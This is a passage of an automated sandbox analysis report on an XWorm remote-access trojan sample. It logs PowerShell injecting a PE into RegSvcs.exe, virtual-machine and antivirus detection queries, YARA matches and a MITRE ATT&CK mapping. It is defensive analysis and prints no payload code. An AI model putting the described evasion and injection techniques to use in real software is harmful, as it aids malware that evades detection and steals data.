            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Query firmware table information (likely to detect VMs)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4423Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5400Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2814Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7012Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4340Thread sleep time: -15679732462653109s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: Amcache.hve.0.drBinary or memory string: VMware
            Source: Amcache.hve.0.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.0.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.0.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.0.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.0.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.0.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.0.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
            Source: Amcache.hve.0.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.0.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.0.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.0.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: RegSvcs.exe, 00000003.00000002.4566148995.0000000000C05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: Amcache.hve.0.drBinary or memory string: vmci.sys
            Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.0.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.0.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.0.drBinary or memory string: VMware20,1
            Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.0.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.0.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.0.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.0.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.0.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.0.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.0.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.0.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.0.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Injects a PE file into a foreign processes
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 410000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 412000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 8A9008Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3728" "2668" "2508" "2672" "0" "0" "2676" "0" "0" "0" "0" "0" Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.0.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.0.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: Amcache.hve.0.drBinary or memory string: MsMpEng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 0.2.powershell.exe.21c4a460438.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.21c4b279478.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.21c4a460438.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.21c4b279478.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4565884702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2168812433.0000021C4AEDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2168812433.0000021C4A4DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3728, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4364, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 0.2.powershell.exe.21c4a460438.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.21c4b279478.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.21c4a460438.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.powershell.exe.21c4b279478.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4565884702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2168812433.0000021C4AEDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2168812433.0000021C4A4DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3728, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4364, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		1
            DLL Side-Loading            		211
            Process Injection            		1
            Disable or Modify Tools            		OS Credential Dumping231
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
